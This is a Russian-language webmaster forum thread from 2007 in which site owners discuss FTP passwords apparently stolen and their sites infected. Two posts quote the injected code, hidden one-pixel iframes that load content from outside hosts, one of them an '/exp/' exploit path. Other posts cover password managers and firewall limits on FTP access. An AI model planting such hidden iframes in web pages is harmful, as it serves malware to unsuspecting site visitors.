Реклама на сайте Advertise with us

Взлом фтп

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

Милитарист

С нами с 13.01.06
Сообщения: 677
Рейтинг: 569

Ссылка на сообщениеДобавлено: 18/05/07 в 14:00       Ответить с цитатойцитата 

Hide-R писал:
pierx: У KeePass, на котором я сижу он очень мощный.


Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..

подкаст для тех кто в бизе: https://anchor.fm/hibrokakbiz

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 18/05/07 в 19:35       Ответить с цитатойцитата 

Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..

в висте вообще то встроенный автобэкап достаточно удобный есть.
я через него ноут на десктоп бэкаплю icon_smile.gif

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 



С нами с 05.11.03
Сообщения: 140
Рейтинг: 98

Ссылка на сообщениеДобавлено: 18/05/07 в 19:58       Ответить с цитатойцитата 

Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.

0
 

www.phpdevs.com

С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105


Передовик Master-X (01.09.2005) Передовик Master-X (16.09.2005) Передовик Master-X (01.10.2005) Передовик Master-X (16.08.2006) Передовик Master-X (16.10.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 18/05/07 в 20:31       Ответить с цитатойцитата 

просто надо нормальный софт использовать а не качать крэки с вареза, тогда шансы быть затрояненным сильно уменьшаются

Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.

0
 

full-plastic programmist

С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779

Ссылка на сообщениеДобавлено: 18/05/07 в 22:34       Ответить с цитатойцитата 

Stek: тут дело не в креках.
я тоже такую заразу поймал, и даже почти догадываюсь где...

Swapper: проверь вот это: %windows%\csrss.exe

по принципу действия очень похож на тот что Ман ссылку давал, тоже имитирует нажатия кнопок в окнах сообщений (т.е. оутпост и каспер не спасают) запускается как системный процесс - просто так не снимешь.

вот соскучился по мастеру...

0
 

127.0.0.1

С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557

Ссылка на сообщениеДобавлено: 19/05/07 в 13:22       Ответить с цитатойцитата 

если есть паранойя или подозрение, запускайте AVZ4 с опциями поиска рут-китов и юзер-китов и максимальным уровнем анализа

май пен рай

0
 



С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222

Ссылка на сообщениеДобавлено: 19/05/07 в 23:40       Ответить с цитатойцитата 

пиздец какой то. на всех доменах поголовно на мордах ифрейм
что он грузит ..х.знает но грузит что то тяжелое в комп и сеть начинает тупить.

везде вот это

Код:

<iframe src='чttp://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='чttp://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

подпись сдается

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 20/05/07 в 12:24       Ответить с цитатойцитата 

Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?

0
 



С нами с 01.11.06
Сообщения: 316
Рейтинг: 293

Ссылка на сообщениеДобавлено: 20/05/07 в 14:38       Ответить с цитатойцитата 


Есть небольшое подозрение, что подцепил кто-то из саппорта разработчиков софта(сж-скриптов, ротаторов, к примеру), которые для установки этого софта просят фтп/ssh-доступ на сервак.

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 20/05/07 в 14:53       Ответить с цитатойцитата 

miroz писал:
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?

да эпидемия уже несколько месяцев идет

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 



С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222

Ссылка на сообщениеДобавлено: 20/05/07 в 15:09       Ответить с цитатойцитата 

ну у меня к примеру нет сиджеев, а трой стоял даже на тех сайтах где вообще ничего нет, один индекс с надписью comming soon
и с сапортом я не общаюсь ни с каким. по аське пароли тоже не проходили

подпись сдается

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 20/05/07 в 15:26       Ответить с цитатойцитата 


может пароли хранил в фтп-клиенте? или еще где на компе

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 



С нами с 21.02.07
Сообщения: 44
Рейтинг: 39

Ссылка на сообщениеДобавлено: 20/05/07 в 16:06       Ответить с цитатойцитата 

наивные, сейчас пароли к фтп...совсем не троянами пиздятся....

0
 



С нами с 19.12.06
Сообщения: 528
Рейтинг: 511

Ссылка на сообщениеДобавлено: 21/05/07 в 01:30       Ответить с цитатойцитата 

Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..

Бекап мне плагин делает. Их пара есть на странице плагинов KeePass...

0
 

full-plastic programmist

С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779

Ссылка на сообщениеДобавлено: 21/05/07 в 09:41       Ответить с цитатойцитата 

_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....

угу, а то что я какую то дрянь при этом у себя нашел - это типа совпадение?

вот соскучился по мастеру...

0
 

Дизайн, вёрстка, то сё

С нами с 16.10.02
Сообщения: 4875
Рейтинг: 3947

Ссылка на сообщениеДобавлено: 21/05/07 в 10:36       Ответить с цитатойцитата 

Milan, очень информативно отписал, спасибо

/me пометил себе "совсем не троянами.."

0
 



С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222

Ссылка на сообщениеДобавлено: 21/05/07 в 17:33       Ответить с цитатойцитата 

понеслось по второму кругу, только с домена РУ на сей раз. начал массово менять пароли, может поможет.

проверяйте свои сайты.

подпись сдается

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 22/05/07 в 09:05       Ответить с цитатойцитата 

Бляяяя, вот, сидишь читаешь, думаешь с тобой такого не случитьсяicon_sad.gif(
Сегодня прихожу. смотрю на одном сайте провалилась прода и траф ниже плинтуса, открываю, а там бля такая хуйня icon_sad.gif

Код:
<iframe src="http://antispyx.info/exp/" width=1 height=1 style="display:none"></iframe>


Самое интересное, на этом дедике несколько сайтов, более того на этом айпищнике несколько доменов, НО ифрем вставили только на одном домене, на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрытьicon_sad.gif(
Вот и думайте.
На других доменах ничего не повесили.

Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на другихicon_sad.gif(

Бля, с этим надо что-то делать!

ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?

0
 



С нами с 19.01.06
Сообщения: 22
Рейтинг: 16

Ссылка на сообщениеДобавлено: 22/05/07 в 09:12       Ответить с цитатойцитата 

miroz писал:
на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрытьicon_sad.gif(
Вот и думайте.
На других доменах ничего не повесили.

Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на другихicon_sad.gif(

ну у разработчика скрипта троян значит, что непонятного то
Цитата:

ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?

в файерволе закрыть 21 порт и разрешить только для своего IP

XXX-Server.BIZ - Хостинг от 0.07$ за гиг

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 22/05/07 в 09:17       Ответить с цитатойцитата 

Swapper писал:
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.


Подозреваю, что это не через трояна ставят, но как не знаюicon_sad.gif

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 22/05/07 в 09:18       Ответить с цитатойцитата 

XXX-Server писал:

в файерволе закрыть 21 порт и разрешить только для своего IP

В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружуicon_sad.gif

0
 



С нами с 19.01.06
Сообщения: 22
Рейтинг: 16

Ссылка на сообщениеДобавлено: 22/05/07 в 09:31       Ответить с цитатойцитата 

miroz писал:
В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружуicon_sad.gif

ну админа попросить значит icon_smile.gif

XXX-Server.BIZ - Хостинг от 0.07$ за гиг

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 22/05/07 в 09:36       Ответить с цитатойцитата 

_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....

Может подробности расскажешь?

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 22/05/07 в 09:38       Ответить с цитатойцитата 

XXX-Server писал:
ну админа попросить значит icon_smile.gif

Админа хрен достанешьicon_sad.gif(

0
 



С нами с 19.01.06
Сообщения: 22
Рейтинг: 16

Ссылка на сообщениеДобавлено: 22/05/07 в 09:40       Ответить с цитатойцитата 

miroz писал:
Админа хрен достанешьicon_sad.gif(

ну мы можем сделать, за небольшую плату и при наличии свободного времени icon_smile.gif
стукни ближе к вечеру к колору, 10-95-48-1-7-9

XXX-Server.BIZ - Хостинг от 0.07$ за гиг

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор сайта

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »